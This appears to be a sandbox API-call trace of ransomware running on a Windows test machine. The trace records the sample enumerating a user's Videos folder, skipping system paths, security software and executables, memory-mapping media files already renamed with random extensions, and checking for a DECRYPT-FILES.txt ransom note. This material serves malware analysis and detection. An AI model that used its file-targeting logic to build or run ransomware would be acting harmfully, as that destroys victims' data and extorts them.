[0186.170] lstrcatW (in: lpString1="Videos", lpString2="\\" | out: lpString1="Videos\\") returned="Videos\\" [0186.170] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Videos\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" [0186.170] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpSrch="\\Program Files") returned 0x0 [0186.170] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpSrch=":\\Windows") returned 0x0 [0186.170] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpSrch="\\Games\\") returned 0x0 [0186.170] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.170] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.171] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.171] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.171] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.171] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpSrch="\\All Users") returned 0x0 [0186.171] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.171] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpSrch="\\Local Settings\\") returned 0x0 [0186.171] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpSrch="\\AppData\\Local") returned 0x0 [0186.171] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpSrch="AhnLab") returned 0x0 [0186.171] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0186.171] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned 37 [0186.171] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.171] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\\\0a16c9.tmp") returned 48 [0186.171] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x254 [0186.171] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned 37 [0186.171] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0186.171] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\\\DECRYPT-FILES.txt") returned 55 [0186.171] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.171] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned 37 [0186.171] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*" [0186.171] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*", lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf1ac27a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf1ac27a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479878 [0186.171] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0186.171] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf1ac27a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf1ac27a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0186.172] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0186.172] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0186.172] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef121510, ftCreationTime.dwHighDateTime=0x1d4cb32, ftLastAccessTime.dwLowDateTime=0x95ae8ce0, ftLastAccessTime.dwHighDateTime=0x1d4c643, ftLastWriteTime.dwLowDateTime=0xb01542e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x6872, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0 cG.mkv.HlBMkEn", cAlternateFileName="0CGMKV~1.HLB")) returned 1 [0186.172] lstrcmpiW (lpString1="0 cG.mkv.HlBMkEn", lpString2="DECRYPT-FILES.txt") returned -1 [0186.172] lstrcmpiW (lpString1="0 cG.mkv.HlBMkEn", lpString2="autorun.inf") returned -1 [0186.172] lstrcmpiW (lpString1="0 cG.mkv.HlBMkEn", lpString2="boot.ini") returned -1 [0186.172] lstrcmpiW (lpString1="0 cG.mkv.HlBMkEn", lpString2="desktop.ini") returned -1 [0186.172] lstrcmpiW (lpString1="0 cG.mkv.HlBMkEn", lpString2="ntuser.dat") returned -1 [0186.172] lstrcmpiW (lpString1="0 cG.mkv.HlBMkEn", lpString2="iconcache.db") returned -1 [0186.172] lstrcmpiW (lpString1="0 cG.mkv.HlBMkEn", lpString2="bootsect.bak") returned -1 [0186.172] lstrcmpiW (lpString1="0 cG.mkv.HlBMkEn", lpString2="ntuser.dat.log") returned -1 [0186.172] lstrcmpiW (lpString1="0 cG.mkv.HlBMkEn", lpString2="thumbs.db") returned -1 [0186.172] lstrcmpiW (lpString1="0 cG.mkv.HlBMkEn", lpString2="Bootfont.bin") returned -1 [0186.172] lstrlenW (lpString="0 cG.mkv.HlBMkEn") returned 16 [0186.173] lstrcmpiW (lpString1="HlBMkEn", lpString2="lnk") returned -1 [0186.173] lstrcmpiW (lpString1="HlBMkEn", lpString2="exe") returned 1 [0186.173] lstrcmpiW (lpString1="HlBMkEn", lpString2="sys") returned -1 [0186.173] lstrcmpiW (lpString1="HlBMkEn", lpString2="dll") returned 1 [0186.173] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned 37 [0186.173] lstrlenW (lpString="0 cG.mkv.HlBMkEn") returned 16 [0186.173] lstrcpyW (in: lpString1=0x36fecd8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" [0186.173] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpString2="0 cG.mkv.HlBMkEn" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0 cG.mkv.HlBMkEn") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0 cG.mkv.HlBMkEn" [0186.173] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.173] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0 cG.mkv.HlBMkEn" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\0 cg.mkv.hlbmken"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c [0186.173] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0x36fe4a0 | out: lpFileSize=0x36fe4a0*=26738) returned 1 [0186.173] CreateFileMappingW (hFile=0x25c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x260 [0186.173] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0186.174] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0186.174] CloseHandle (hObject=0x260) returned 1 [0186.174] CloseHandle (hObject=0x25c) returned 1 [0186.174] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.174] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf126daa0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xf1ac27a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf1ac27a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0186.175] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0186.175] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0186.175] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0186.175] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0186.175] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0186.175] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0186.175] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0186.175] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0186.175] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0186.175] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0186.175] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.175] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0186.175] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0186.175] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0186.175] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0186.175] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned 37 [0186.175] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.175] lstrcpyW (in: lpString1=0x36fecd8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" [0186.175] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0a16c9.tmp" [0186.175] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.175] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.175] CloseHandle (hObject=0x0) returned 0 [0186.175] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.176] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbeaf30, ftCreationTime.dwHighDateTime=0x1d4cb81, ftLastAccessTime.dwLowDateTime=0x81fb3330, ftLastAccessTime.dwHighDateTime=0x1d4d1e0, ftLastWriteTime.dwLowDateTime=0xb017a440, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x2054, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="32wZ-Id2IDooHz.flv.2CTtSFT", cAlternateFileName="32WZ-I~1.2CT")) returned 1 [0186.176] lstrcmpiW (lpString1="32wZ-Id2IDooHz.flv.2CTtSFT", lpString2="DECRYPT-FILES.txt") returned -1 [0186.176] lstrcmpiW (lpString1="32wZ-Id2IDooHz.flv.2CTtSFT", lpString2="autorun.inf") returned -1 [0186.176] lstrcmpiW (lpString1="32wZ-Id2IDooHz.flv.2CTtSFT", lpString2="boot.ini") returned -1 [0186.176] lstrcmpiW (lpString1="32wZ-Id2IDooHz.flv.2CTtSFT", lpString2="desktop.ini") returned -1 [0186.176] lstrcmpiW (lpString1="32wZ-Id2IDooHz.flv.2CTtSFT", lpString2="ntuser.dat") returned -1 [0186.176] lstrcmpiW (lpString1="32wZ-Id2IDooHz.flv.2CTtSFT", lpString2="iconcache.db") returned -1 [0186.176] lstrcmpiW (lpString1="32wZ-Id2IDooHz.flv.2CTtSFT", lpString2="bootsect.bak") returned -1 [0186.176] lstrcmpiW (lpString1="32wZ-Id2IDooHz.flv.2CTtSFT", lpString2="ntuser.dat.log") returned -1 [0186.176] lstrcmpiW (lpString1="32wZ-Id2IDooHz.flv.2CTtSFT", lpString2="thumbs.db") returned -1 [0186.176] lstrcmpiW (lpString1="32wZ-Id2IDooHz.flv.2CTtSFT", lpString2="Bootfont.bin") returned -1 [0186.176] lstrlenW (lpString="32wZ-Id2IDooHz.flv.2CTtSFT") returned 26 [0186.176] lstrcmpiW (lpString1="2CTtSFT", lpString2="lnk") returned -1 [0186.176] lstrcmpiW (lpString1="2CTtSFT", lpString2="exe") returned -1 [0186.176] lstrcmpiW (lpString1="2CTtSFT", lpString2="sys") returned -1 [0186.176] lstrcmpiW (lpString1="2CTtSFT", lpString2="dll") returned -1 [0186.176] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned 37 [0186.176] lstrlenW (lpString="32wZ-Id2IDooHz.flv.2CTtSFT") returned 26 [0186.176] lstrcpyW (in: lpString1=0x36fecd8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" [0186.176] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpString2="32wZ-Id2IDooHz.flv.2CTtSFT" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\32wZ-Id2IDooHz.flv.2CTtSFT") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\32wZ-Id2IDooHz.flv.2CTtSFT" [0186.176] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.176] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\32wZ-Id2IDooHz.flv.2CTtSFT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\32wz-id2idoohz.flv.2cttsft"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c [0186.177] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0x36fe4a0 | out: lpFileSize=0x36fe4a0*=8276) returned 1 [0186.177] CreateFileMappingW (hFile=0x25c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x260 [0186.177] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0186.178] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0186.178] CloseHandle (hObject=0x260) returned 1 [0186.178] CloseHandle (hObject=0x25c) returned 1 [0186.178] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.178] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xebd22680, ftCreationTime.dwHighDateTime=0x1d4d07b, ftLastAccessTime.dwLowDateTime=0x35064c60, ftLastAccessTime.dwHighDateTime=0x1d4cba3, ftLastWriteTime.dwLowDateTime=0xb01c6700, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x97c5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8XdinFYWI5XC.mkv.ntVdm", cAlternateFileName="8XDINF~1.NTV")) returned 1 [0186.178] lstrcmpiW (lpString1="8XdinFYWI5XC.mkv.ntVdm", lpString2="DECRYPT-FILES.txt") returned -1 [0186.178] lstrcmpiW (lpString1="8XdinFYWI5XC.mkv.ntVdm", lpString2="autorun.inf") returned -1 [0186.178] lstrcmpiW (lpString1="8XdinFYWI5XC.mkv.ntVdm", lpString2="boot.ini") returned -1 [0186.178] lstrcmpiW (lpString1="8XdinFYWI5XC.mkv.ntVdm", lpString2="desktop.ini") returned -1 [0186.178] lstrcmpiW (lpString1="8XdinFYWI5XC.mkv.ntVdm", lpString2="ntuser.dat") returned -1 [0186.178] lstrcmpiW (lpString1="8XdinFYWI5XC.mkv.ntVdm", lpString2="iconcache.db") returned -1 [0186.178] lstrcmpiW (lpString1="8XdinFYWI5XC.mkv.ntVdm", lpString2="bootsect.bak") returned -1 [0186.178] lstrcmpiW (lpString1="8XdinFYWI5XC.mkv.ntVdm", lpString2="ntuser.dat.log") returned -1 [0186.178] lstrcmpiW (lpString1="8XdinFYWI5XC.mkv.ntVdm", lpString2="thumbs.db") returned -1 [0186.178] lstrcmpiW (lpString1="8XdinFYWI5XC.mkv.ntVdm", lpString2="Bootfont.bin") returned -1 [0186.178] lstrlenW (lpString="8XdinFYWI5XC.mkv.ntVdm") returned 22 [0186.178] lstrcmpiW (lpString1="ntVdm", lpString2="lnk") returned 1 [0186.178] lstrcmpiW (lpString1="ntVdm", lpString2="exe") returned 1 [0186.178] lstrcmpiW (lpString1="ntVdm", lpString2="sys") returned -1 [0186.178] lstrcmpiW (lpString1="ntVdm", lpString2="dll") returned 1 [0186.178] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned 37 [0186.178] lstrlenW (lpString="8XdinFYWI5XC.mkv.ntVdm") returned 22 [0186.178] lstrcpyW (in: lpString1=0x36fecd8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" [0186.178] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpString2="8XdinFYWI5XC.mkv.ntVdm" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\8XdinFYWI5XC.mkv.ntVdm") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\8XdinFYWI5XC.mkv.ntVdm" [0186.178] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.179] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\8XdinFYWI5XC.mkv.ntVdm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\8xdinfywi5xc.mkv.ntvdm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c [0186.179] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0x36fe4a0 | out: lpFileSize=0x36fe4a0*=38853) returned 1 [0186.179] CreateFileMappingW (hFile=0x25c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x260 [0186.179] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0186.180] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0186.180] CloseHandle (hObject=0x260) returned 1 [0186.180] CloseHandle (hObject=0x25c) returned 1 [0186.180] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.180] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae6408a0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xae6408a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xae666a00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0186.181] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0186.181] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0186.181] lstrcmpiW (lpString1="desktop.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0186.181] lstrcmpiW (lpString1="desktop.ini", lpString2="autorun.inf") returned 1 [0186.181] lstrcmpiW (lpString1="desktop.ini", lpString2="boot.ini") returned 1 [0186.181] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0186.181] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56287b80, ftCreationTime.dwHighDateTime=0x1d4d313, ftLastAccessTime.dwLowDateTime=0xc82b7070, ftLastAccessTime.dwHighDateTime=0x1d4c5cb, ftLastWriteTime.dwLowDateTime=0xb01ec860, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x1306f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="eD8jo.flv.AIRWZ", cAlternateFileName="ED8JOF~1.AIR")) returned 1 [0186.181] lstrcmpiW (lpString1="eD8jo.flv.AIRWZ", lpString2="DECRYPT-FILES.txt") returned 1 [0186.181] lstrcmpiW (lpString1="eD8jo.flv.AIRWZ", lpString2="autorun.inf") returned 1 [0186.181] lstrcmpiW (lpString1="eD8jo.flv.AIRWZ", lpString2="boot.ini") returned 1 [0186.181] lstrcmpiW (lpString1="eD8jo.flv.AIRWZ", lpString2="desktop.ini") returned 1 [0186.181] lstrcmpiW (lpString1="eD8jo.flv.AIRWZ", lpString2="ntuser.dat") returned -1 [0186.181] lstrcmpiW (lpString1="eD8jo.flv.AIRWZ", lpString2="iconcache.db") returned -1 [0186.181] lstrcmpiW (lpString1="eD8jo.flv.AIRWZ", lpString2="bootsect.bak") returned 1 [0186.181] lstrcmpiW (lpString1="eD8jo.flv.AIRWZ", lpString2="ntuser.dat.log") returned -1 [0186.181] lstrcmpiW (lpString1="eD8jo.flv.AIRWZ", lpString2="thumbs.db") returned -1 [0186.181] lstrcmpiW (lpString1="eD8jo.flv.AIRWZ", lpString2="Bootfont.bin") returned 1 [0186.181] lstrlenW (lpString="eD8jo.flv.AIRWZ") returned 15 [0186.181] lstrcmpiW (lpString1="AIRWZ", lpString2="lnk") returned -1 [0186.181] lstrcmpiW (lpString1="AIRWZ", lpString2="exe") returned -1 [0186.181] lstrcmpiW (lpString1="AIRWZ", lpString2="sys") returned -1 [0186.181] lstrcmpiW (lpString1="AIRWZ", lpString2="dll") returned -1 [0186.181] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned 37 [0186.181] lstrlenW (lpString="eD8jo.flv.AIRWZ") returned 15 [0186.181] lstrcpyW (in: lpString1=0x36fecd8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" [0186.181] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpString2="eD8jo.flv.AIRWZ" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\eD8jo.flv.AIRWZ") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\eD8jo.flv.AIRWZ" [0186.181] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.181] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\eD8jo.flv.AIRWZ" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ed8jo.flv.airwz"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c [0186.182] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0x36fe4a0 | out: lpFileSize=0x36fe4a0*=77935) returned 1 [0186.182] CreateFileMappingW (hFile=0x25c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x260 [0186.182] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0186.183] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0186.183] CloseHandle (hObject=0x260) returned 1 [0186.183] CloseHandle (hObject=0x25c) returned 1 [0186.183] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.183] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2dd4cb60, ftCreationTime.dwHighDateTime=0x1d4d599, ftLastAccessTime.dwLowDateTime=0xa733ef90, ftLastAccessTime.dwHighDateTime=0x1d4d08a, ftLastWriteTime.dwLowDateTime=0xb0238b20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x366e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fnxRi.avi.F1jPeJ", cAlternateFileName="FNXRIA~1.F1J")) returned 1 